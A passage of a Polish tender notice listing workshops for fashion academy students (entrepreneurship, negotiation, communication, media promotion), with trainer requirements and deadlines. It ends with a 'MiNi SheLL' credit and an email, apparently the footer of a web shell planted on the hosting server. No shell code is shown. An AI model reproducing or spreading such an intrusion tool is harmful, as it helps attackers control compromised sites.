-    formy uczestnictwa w imprezach wystawienniczych i pokazowych
-	tworzenie zgłoszenia targowego 
-	projektowanie stoiska targowego
-	tworzenie zgłoszeń na imprezy wystawienniczo-pokazowe
-	przygotowanie pokazu

5.	Korzyści płynące ze spotkań środowiska mody:
- możliwości dla młodego projektanta
     - promocja i budowanie marki przez uczestnictwo w spotkaniach
     - biznesowy wymiar spotkań
          - możliwości kreowania rynku?
          
Cel warsztatu/doradztwa:

-Zapoznanie uczestników z charakterem, celami i rodzajem spotkań środowiska mody zarówno w Polsce jak i zagranicą, 
-Przedstawienie etapów organizacji i form uczestnictwa w imprezach wystawienniczych, pokazowych i wystawienniczo-pokazowych
-	Zaznajomienie uczestników z charakterem największego spotkania środowiska mody w Polsce - FashionPhilosophy Fashion Week Poland
-	Praktyczne poznanie narzędzi i technik pozwalających na przygotowanie się do uczestnictwa w spotkaniach środowiska mody
-	Poszerzenie wiedzy o możliwościach jakie dają spotkania środowiska mody

Metodyka
Spotkanie prowadzone będzie w formie wykładu opartego na wiedzy i doświadczeniu w połączeniu z metodą warsztatową, z wykorzystaniem prezentacji medialnej, w sposób interaktywny, włączającą  do udziału wszystkich uczestników warsztatów. 

Materiały szkoleniowe: wykonawca w odniesieniu do każdej części zamówienia zobowiązany jest przygotować materiały szkoleniowe dotyczące tematyki doradztwa/warsztatu.  Każdy z uczestników musi otrzymać po jednym egzemplarzu materiałów szkoleniowych dotyczących danej tematyki. Dodatkowo jeden egzemplarz materiałów szkoleniowych wykonawca zobowiązany jest przekazać Zamawiającemu.

Osoby przewidziane do realizacji zamówienia

Kadra dydaktyczna wskazana przez wykonawcę powinna obejmować:
 
Jednego wykładowcę (trenera/coacha) posiadającego:
- wyższe wykształcenie w zakresie projektowania 
- minimum 20-sto letnie doświadczenie w branży mody 
- organizacja minimum 5-ciu imprez wystawienniczo-pokazowych (dziennie   
  minimum 2 tysiące osób odwiedzających imprezę)
- minimum 20-sto letnie prowadzenie działalności gospodarczej związanej z branżą mody 
- mininimum 19-sto letnia współpraca z zagranicznymi partnerami z branży mody
- organizacja minimum 100 pokazów mody.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Warsztaty/doradztwo pn. Przedsiębiorczość w przemyśle odzieżowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymagany zakres warsztatów/doradztwa:
przeprowadzenie dwóch spotkań o charakterze warsztatowym i doradczym dla studentów Akademii w zakresie:

1. Podstawy przedsiębiorczości
projektant - przedsiębiorca
rola kreatywności i innowacji w biznesie
ocena ryzyka w przedsiębiorstwie

2. Charakterystyka (polskiego) rynku odzieżowego
struktura i segmentacja rynku odzieżowego, 
aktualna sytuacja na rynku mody
budowanie marki odzieżowej

3. Własny biznes modowy
formy własności i formy organizacyjno-prawne najlepsze dla branży mody
organizacja i zarządzanie w przedsiębiorstwie modowym
czynniki ryzyka
przedsiębiorczość na rynku lokalnym i ogólnopolskim

4. Czynniki kształtujące rozwój w branży 
umiejętność analizy zapotrzebowania rynku odzieżowego 
konkurencyjność w branży
umiejętna komunikacja: zespół, marketing, klient

5. Rozwój kreatywności - część warsztatowa w grupach:
budowanie strategii przedsiębiorstwa
marketingowe założenia firmy
budowanie budżetu premierowego pokazu mody
planowanie budżetu i formy stoiska na targach w Berlinie
burza mózgów - kreatywne metody rozwiązywania problemów w firmie

6. Możliwości młodych projektantów na rynku mody:
rozpoznanie własnego potencjału zawodowego
rola lidera w zespole projektowym
rodzaje wsparcia przedsiębiorczości młodych projektantów
przedsiębiorczość - działanie pojedynczo czy w grupie?
praca w zespołach projektowych - sposób na dobry start na rynku mody

Cel warsztatu/doradztwa:

-	Uświadomienie uczestnikom, jaka jest rola przedsiębiorczości w tworzeniu własnej ścieżki zawodowej
-	Zapoznanie uczestników ze specyfiką rynku odzieżowego w Polsce
-	Przedstawienie możliwości zbudowania własnego przedsiębiorstwa modowego
-	Zwrócenie uwagi na czynniki ryzyka na rynku mody
-	Praktyczne poznanie narzędzi i technik pozwalających na budowanie i rozwój przedsiębiorstwa odzieżowego
-	Poszerzenie wiedzy o możliwych formach współpracy i wsparcia dla młodych projektantów

Metodyka
Spotkanie prowadzone będzie w formie wykładu w połączeniu z metodą warsztatową, z wykorzystaniem prezentacji medialnej, w sposób interaktywny, włączającą  do udziału wszystkich uczestników warsztatów. 

Materiały szkoleniowe: wykonawca w odniesieniu do każdej części zamówienia zobowiązany jest przygotować materiały szkoleniowe dotyczące tematyki doradztwa/warsztatu.  Każdy z uczestników musi otrzymać po jednym egzemplarzu materiałów szkoleniowych dotyczących danej tematyki. Dodatkowo jeden egzemplarz materiałów szkoleniowych wykonawca zobowiązany jest przekazać Zamawiającemu.

Osoby przewidziane do realizacji zamówienia

Kadra dydaktyczna wskazana przez wykonawcę powinna obejmować:
 
Jednego wykładowcę (trenera/coacha) posiadającego:
- wyższe wykształcenie w zakresie projektowania 
- minimum 20-sto letnie doświadczenie w branży mody 
- organizacja minimum 5-ciu imprez wystawienniczo-pokazowych (dziennie   
  minimum 2 tysiące osób odwiedzających imprezę)
- minimum 20-sto letnie prowadzenie działalności gospodarczej związanej z branżą mody 
- minimum 19-sto letnia współpraca z zagranicznymi partnerami z branży mody
- organizacja minimum 100 pokazów mody.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Warsztaty/doradztwo pn. Ośrodki wspierające projektanta w Polsce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymagany zakres warsztatów/doradztwa:
przeprowadzenie dwóch spotkań o charakterze warsztatowym i doradczym dla studentów Akademii w zakresie:

1. Rodzaje możliwego wsparcia dla młodego projektanta
- pomoc marketingowa
- sponsoring
- podnoszenie kwalifikacji
- współpraca z dużymi firmami odzieżowymi
- współpraca projektantów

2. Ośrodki wspierające projektanta - prezentacja na przykładach
- klastry i inkubatory
- instytucje (szkolnictwa wyższego - państwowe i prywatne , kształcenie podyplomowe, urzędy, regionalne instytucje wsparcia)
- fundacje

3. Korzystanie z projektów unijnych
-	jak szukać możliwości dofinansowania
-	umiejętne pisanie wniosków
-	uczestnictwo w projektach wspieranych przez UE

4.    Jak skorzystać z pomocy ośrodków wspierających projektantów w praktyce - praca warsztatowa w grupach
         -    przy rozwoju własnych umiejętności 
         -    przy otworzeniu własnej firmy modowej
         -    przy organizacji pierwszego pokazu mody
-	przy rozwoju marki

Cel warsztatu/doradztwa:

-	Zaznajomienie uczestników różnymi możliwościami wsparcia dla rozwoju ich działań projektowych
-	Przedstawienie zasad współpracy z poszczególnymi podmiotami
-	Poszerzenie wiedzy o istniejących w Polsce ośrodkach wspierających młodych projektantów i zasadami ich działania
-	Zapoznanie z możliwościami uzyskania wsparcia w ramach projektów unijnych
-	Nabycie praktycznych umiejętności wykorzystania możliwości, które dają ośrodki wspierające projektantów w Polsce

Metodyka
Spotkanie prowadzone będzie w formie wykładu opartego na wiedzy i doświadczeniu w połączeniu z metodą warsztatową, z wykorzystaniem prezentacji medialnej, w sposób interaktywny, włączającą  do udziału wszystkich uczestników warsztatów. 

Materiały szkoleniowe: wykonawca w odniesieniu do każdej części zamówienia zobowiązany jest przygotować materiały szkoleniowe dotyczące tematyki doradztwa/warsztatu.  Każdy z uczestników musi otrzymać po jednym egzemplarzu materiałów szkoleniowych dotyczących danej tematyki. Dodatkowo jeden egzemplarz materiałów szkoleniowych wykonawca zobowiązany jest przekazać Zamawiającemu.

Osoby przewidziane do realizacji zamówienia

Kadra dydaktyczna wskazana przez wykonawcę powinna obejmować:
 
Jednego wykładowcę (trenera/coacha) posiadającego:
- wyższe wykształcenie w zakresie projektowania 
- minimum 20-sto letnie doświadczenie w branży mody 
- organizacja minimum 5-ciu imprez wystawienniczo-pokazowych (dziennie   
  minimum 2 tysiące osób odwiedzających imprezę)
- minimum 20-sto letnie prowadzenie działalności gospodarczej związanej z branżą mody 
- minimum 19-sto letnia współpraca z zagranicznymi partnerami z branży mody
- organizacja minimum 100 pokazów mody.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Warsztaty/doradztwo pn. Komunikacja interpersonalna i komunikacja rynkowa w budowaniu wizerunku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymagany zakres warsztatów/doradztwa:
przeprowadzenie dwóch jednodniowych spotkań o charakterze warsztatowym i doradczym dla studentów Akademii w zakresie:

Spotkanie I
-	Istota procesu komunikacji
-	Kanały komunikacyjne
-	Aktywne słuchanie
-	Rola nastawienia i przekonań w procesie komunikacji rynkowej
-	Kształtowanie profesjonalnego wizerunku na rynku
-	Narzędzia PR

Spotkanie II
-	Techniki wpływu społecznego
-	Komunikacja perswazyjna
-	Prezentacja oferty
-	Komunikacja w kontakcie z Klientem - analiza typu komunikacyjnego
-	Elastyczność w komunikacji
-	Prowadzenie spotkań biznesowych

Cel warsztatu/doradztwa:

-	Zdobywanie praktycznych umiejętności w zakresie nadawania i odbierania komunikatów.
-	Poznanie rodzajów komunikacji i określenie ich roli w różnych sytuacjach
-	Określenie wpływu przezywanych uczuć i emocji na proces komunikacji.
-	Zdobycie informacji i umiejętności na temat wpływu zgodności treści werbalnych i niewerbalnych.
-	Uświadomienia istnienia znaczenia barier komunikacyjnych; przedstawienie ograniczeń i zaburzeń w relacjach międzyludzkich, wynikających z barier komunikacyjnych.
-	Zrozumienie roli komunikacji w kreowaniu wizerunku na rynku
-	Umiejętność wpływania na postawy Klientów.
-	Zdefiniowanie różnic pomiędzy wizerunkiem prywatnym i profesjonalnym
-	Elementy komunikacji rynkowej i PR


Metodyka

Nauka odbywać się będzie w oparciu o specyfikę nauczania dorosłych. Szkolenie będzie prowadzone aktywnymi metodami warsztatowymi, pozwalającymi uczestnikom zrozumieć, doświadczyć i ćwiczyć wybrane umiejętności. 
Metoda warsztatowa zakłada maksymalny i aktywny udział uczestników przy zminimalizowaniu tradycyjnych sposobów przekazywania wiedzy.
Podczas szkolenia wykorzystywane będą następujące techniki:
-	ćwiczenia (np. gry, mini symulacje), wprowadzające do tematu,
-	większe struktury ćwiczeniowe - dłuższe symulacje integrujące szereg umiejętności,
-	krótkie wykłady, wprowadzające i podsumowujące zagadnienie.

Materiały szkoleniowe: wykonawca w odniesieniu do każdej części zamówienia zobowiązany jest przygotować materiały szkoleniowe dotyczące tematyki doradztwa/warsztatu.  Każdy z uczestników musi otrzymać po jednym egzemplarzu materiałów szkoleniowych dotyczących danej tematyki. Dodatkowo jeden egzemplarz materiałów szkoleniowych wykonawca zobowiązany jest przekazać Zamawiającemu.

Osoby przewidziane do realizacji zamówienia

Kadra dydaktyczna wskazana przez wykonawcę powinna obejmować:
Jednego wykładowcę (trenera/coacha) posiadającego:
- wyższe wykształcenie w zakresie psychologii i zarządzania, 
- minimum 10-cio letnie doświadczenie w pracy dydaktycznej i trenerskiej (łącznie), 
- minimum 10-cio letnie doświadczenie w prowadzeniu szkoleń i warsztatów dla kadry zarządzającej i kierowniczej przedsiębiorstw, firm, urzędów, podnoszących kompetencje menedżera m.in. w zakresie: zarządzania i kierowania zespołem, komunikacji, technik negocjacyjnych, obsługi klienta, efektywności osobistej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Warsztaty/doradztwo pn. Negocjacje handlowe w branży modowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pprzeprowadzenie dwóch spotkań o charakterze warsztatowym i doradczym dla studentów Akademii w zakresie:
-	Sytuacje sprzyjające powstawaniu konfliktów - analiza warunków niezbędnych do wystąpienia sytuacji konfliktowej - różnice poglądów a konflikt;
-	Dynamika i konsekwencje konfliktu interesów - jak rozwija się sytuacja konfliktowa, jej przebieg oraz możliwe następstwa;
-	Zasady negocjacji skierowanych na współpracę - podstawy procesu negocjacji - o czym należy pamiętać gdy planuje się negocjacje;
-	Budowanie atmosfery współpracy - jak sprawić by emocje nie wzięły góry nad potrzebą rozwiązania sytuacji;
-	Język negocjacji - behawioralne i lingwistyczne konstrukcje ułatwiające wypracowanie rozwiązań;
-	Stereotypy, matryce, mapy i filtry - jak postrzegamy i jak możemy być postrzegani w procesie negocjacji;
-	Budowanie strategii negocjacyjnych - analiza etapów przygotowania do negocjacji - niezbędne warunki, które muszą być spełnione przed przystąpieniem do rozmów;
-	Techniki negocjacyjne - sposoby prowadzenia negocjacji - analiza gier negocjacyjnych;

Cel warsztatu/doradztwa:

Celem warsztatu jest zapoznanie uczestników z mechanizmami rządzącymi powstawaniem i rozwojem sytuacji konfliktu interesów oraz z technikami negocjacyjnymi w branży modowej, które służą dochodzeniu do satysfakcjonujących rozwiązań. Praca z Klientem zawsze pociąga za sobą niebezpieczeństwo pojawienia się elementów nie do końca zgodnych z naszymi oczekiwaniami. Należy zatem nauczyć się jak postępować by sytuacje takie nie wpłynęły negatywnie zarówno na wizerunek Firmy jak i skuteczność w realizacji powierzonych obowiązków.

Metodyka
Nauka odbywać się będzie w oparciu o specyfikę nauczania dorosłych. Szkolenie będzie prowadzone aktywnymi metodami warsztatowymi, pozwalającymi uczestnikom zrozumieć, doświadczyć i ćwiczyć wybrane umiejętności. 
Metoda warsztatowa zakłada maksymalny i aktywny udział uczestników przy zminimalizowaniu tradycyjnych sposobów przekazywania wiedzy.
Podczas szkolenia wykorzystywane będą następujące techniki:
-	ćwiczenia (np. gry, mini symulacje), wprowadzające do tematu,
-	większe struktury ćwiczeniowe - dłuższe symulacje integrujące szereg umiejętności,
-	krótkie wykłady, wprowadzające i podsumowujące zagadnienie.

Materiały szkoleniowe: wykonawca w odniesieniu do każdej części zamówienia zobowiązany jest przygotować materiały szkoleniowe dotyczące tematyki doradztwa/warsztatu.  Każdy z uczestników musi otrzymać po jednym egzemplarzu materiałów szkoleniowych dotyczących danej tematyki. Dodatkowo jeden egzemplarz materiałów szkoleniowych wykonawca zobowiązany jest przekazać Zamawiającemu.

Osoby przewidziane do realizacji zamówienia

Kadra dydaktyczna wskazana przez wykonawcę powinna obejmować

Jednego wykładowcę (trenera/coacha) posiadającego:
- wyższe wykształcenie w zakresie psychologii i zarządzania, 
- minimum 10-cio letnie doświadczenie w pracy dydaktycznej i trenerskiej (łącznie), 
- minimum 10-cio letnie doświadczenie w prowadzeniu szkoleń i warsztatów dla kadry zarządzającej i kierowniczej przedsiębiorstw, firm, urzędów, podnoszących kompetencje menedżera m.in. w zakresie: zarządzania i kierowania zespołem, komunikacji, technik negocjacyjnych, obsługi klienta, efektywności osobistej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Warsztat/doradztwo pn. Efektywność osobista z elementami  inteligencji emocjonalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie dwóch jednodniowych spotkań o charakterze warsztatowym i doradczym dla studentów Akademii w zakresie:

Dzień I
-	Analiza osobistego stylu funkcjonowania
-	Refleksja nad własną efektywnością
-	Podstawowe elementy inteligencji emocjonalnej
-	identyfikacja trudności w efektywnym funkcjonowaniu
-	Rola stereotypów i przekonań w funkcjonowaniu (metoda PPP)
-	Organizacja miejsca pracy
-	Narzędzia ułatwiające kontrolę realizacji zadań
-	Nadawanie priorytetów (macierz Eisenhowera)

Dzień II
-	Zasady planowania
-	Wyznaczanie celów osobistych i zawodowych:
-	Zasady efektywnego wyznaczania celów
-	Cechy precyzyjnie zdefiniowanego celu
-	Planowanie środków
-	Osiąganie celów
-	Kontrola realizacji Tworzenie Action Plans
-	Planowanie jako narzędzie wzbudzania automotywacji

Cel warsztatu/doradztwa:

-	Uświadomienie uczestnikom, że można skutecznie zwiększyć swoją efektywność poprzez rozumienie siebie i relacji z innymi ludźmi
-	Zwiększenie wydajności osobistej i grupowej w realizacji zadań 
-	Wzrost motywacji osiągnięć oraz pracy nad sobą
-	Efektywne reagowanie na zadania o różnym priorytecie i nabycie umiejętności priorytetyzacji działań
-	Poznanie narzędzi i technik bezpośrednio wpływających na podniesienie efektywności wykonywania obowiązków zawodowych
-	Analiza osobistego stylu funkcjonowania.

Metodyka
Nauka odbywać się będzie w oparciu o specyfikę nauczania dorosłych. Szkolenie będzie prowadzone aktywnymi metodami warsztatowymi, pozwalającymi uczestnikom zrozumieć, doświadczyć i ćwiczyć wybrane umiejętności. 
Metoda warsztatowa zakłada maksymalny i aktywny udział uczestników przy zminimalizowaniu tradycyjnych sposobów przekazywania wiedzy.
Podczas szkolenia wykorzystywane będą następujące techniki:
-	ćwiczenia (np. gry, mini symulacje), wprowadzające do tematu,
-	większe struktury ćwiczeniowe - dłuższe symulacje integrujące szereg umiejętności,
-	krótkie wykłady, wprowadzające i podsumowujące zagadnienie.

Materiały szkoleniowe: wykonawca w odniesieniu do każdej części zamówienia zobowiązany jest przygotować materiały szkoleniowe dotyczące tematyki doradztwa/warsztatu.  Każdy z uczestników musi otrzymać po jednym egzemplarzu materiałów szkoleniowych dotyczących danej tematyki. Dodatkowo jeden egzemplarz materiałów szkoleniowych wykonawca zobowiązany jest przekazać Zamawiającemu.

Osoby przewidziane do realizacji zamówienia

Kadra dydaktyczna wskazana przez wykonawcę powinna obejmować

Jednego wykładowcę (trenera/coacha) posiadającego:
- wyższe wykształcenie w zakresie psychologii i zarządzania, 
- minimum 10-cio letnie doświadczenie w pracy dydaktycznej i trenerskiej (łącznie), 
- minimum 10-cio letnie doświadczenie w prowadzeniu szkoleń i warsztatów dla kadry zarządzającej i kierowniczej przedsiębiorstw, firm, urzędów, podnoszących kompetencje menedżera m.in. w zakresie: zarządzania i kierowania zespołem, komunikacji, technik negocjacyjnych, obsługi klienta, efektywności osobistej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Warsztaty/doradztwo pn. Rola projektanta w dużej firmie odzieżowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymagany zakres warsztatów/doradztwa:
przeprowadzenie dwóch spotkań o charakterze warsztatowym i doradczym dla studentów Akademii w zakresie:

1.	CYKL POWSTAWANIA KOLEKCJI W DUŻYCH FIRMACH

2.	SPECYFIKA PRACY NA STANOWISKU PROJEKTANTA

3.	PRZEWIDYWANIE TRENDÓW W DUŻEJ FIRMIE

4.	 ANALIZA POTRZEB ADRESATA KOLEKCJI

5.	ROLA PROJEKTANTA W FIRMIE : FORMA AUTONOMICZNA CZY GRUPOWA?

6.	SAMOREALIZACJA PROJEKTANTA W DUŻEJ FIRMIE ODZIEZOWEJ

Cel warsztatu/doradztwa:

-	ZAPOZNANIE STUDENTÓW Z PRACA DUŻEJ FIRMY ODZIEŻOWEJ
-	DOSTOSOWANIE WŁASNYCH PROJEKTÓW DLA POTRZEB MASOWEGO ODBIORCY
-	EFEKTYWNE REAGOWANIE NA WYTYCZNE BRAND MENAGERA

Metodyka
Spotkanie prowadzone będzie w formie wykładu 

Materiały szkoleniowe: wykonawca w odniesieniu do każdej części zamówienia zobowiązany jest przygotować materiały szkoleniowe dotyczące tematyki doradztwa/warsztatu.  Każdy z uczestników musi otrzymać po jednym egzemplarzu materiałów szkoleniowych dotyczących danej tematyki. Dodatkowo jeden egzemplarz materiałów szkoleniowych wykonawca zobowiązany jest przekazać Zamawiającemu.

Osoby przewidziane do realizacji zamówienia

Kadra dydaktyczna wskazana przez wykonawcę powinna obejmować

Jednego wykładowcę (trenera/coacha) posiadającego:

- wyższe wykształcenie w zakresie projektowania odzieży
- minimum 10-cio letnie doświadczenie jako projektanta w pracy w dużych firmach odzieżowych
- minimum 10-cio letnie doświadczenie w projektowaniu dla firm oraz tworzeniu własnych autorskich kolekcji
- budowanie od podstaw nowej marki odzieżowej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Warsztaty/doradztwo pn. Promocja projektanta w mediach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymagany zakres warsztatów/doradztwa:
przeprowadzenie dwóch spotkań o charakterze warsztatowym i doradczym dla studentów Akademii w zakresie:

1. Planowania promocji w mediach
-      forma prezentacji
-      sposób realizacji

  2. Problemów w prezentacji swoich osiągnięć w mediach
-      eksplikacja pomysłu
-      elastyczność planowania występu przed kamerami
-      autopromocja


  3. Sposobów kreowania siebie jako artysty w szerszym forum
-      publiczne wystąpienie
-      występ telewizyjny

  4. Skutecznej autoprezentacji autorskich pomysłów
-      analiza efektywności własnej pracy

  5. Właściwej oceny i samokontroli podczas występu na żywo
-      gestykulacja
-      używania poprawnej polszczyzny
-      pożądane i zakazane formy wyrazu  


  Cel warsztatu/doradztwa: 

   - uświadomienie uczestnikom jak skutecznie prezentować się w mediach,

  - uzyskanie kontroli nad prezentowaniem siebie i swoich projektów w mediach,

  - wzrost motywacji do autopromocji,

  - efektywne współdziałanie z przedstawicielami mediów,,

  - wypracowanie skutecznych metod promocji kreatora w mediach.

  Metodyka: 
spotkanie będzie prowadzone w formie autotreningu i autoprezentacji w mediach, z
wykorzystaniem aktywnych metod dydaktycznych, w sposób interaktywny, włączający w
uczestnictwo każdego biorącego udział w zajęciach

Materiały szkoleniowe: wykonawca w odniesieniu do każdej części zamówienia zobowiązany jest przygotować materiały szkoleniowe dotyczące tematyki doradztwa/warsztatu.  Każdy z uczestników musi otrzymać po jednym egzemplarzu materiałów szkoleniowych dotyczących danej tematyki. Dodatkowo jeden egzemplarz materiałów szkoleniowych wykonawca zobowiązany jest przekazać Zamawiającemu.


Osoby przewidziane do realizacji zamówienia

Kadra dydaktyczna wskazana przez wykonawcę powinna obejmować

Jednego wykładowcę (trenera/coacha) posiadającego:

- wyższe wykształcenie artystyczne,
- udokumentowane przygotowanie pedagogiczne,
- minimum 20-letnie doświadczenie w pracy dziennikarza telewizyjnego, w szczególności  w zakresie prowadzenia serwisów informacyjnych, wydawanie i prowadzenie programów autorskich - magazynów o tematyce kulturalnej, prowadzenie programów ogólnopolskich o charakterze publicystycznym, przygotowanie codziennych relacji reporterskich, felietonów, reportaży w każdej dziedzinie. Specjalizacja - relacje o charakterze kulturalnym - wystawy, relacje z pokazów mody, koncerty.
- doświadczenie w prowadzeniu halowych i plenerowych imprez o charakterze kulturalnym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com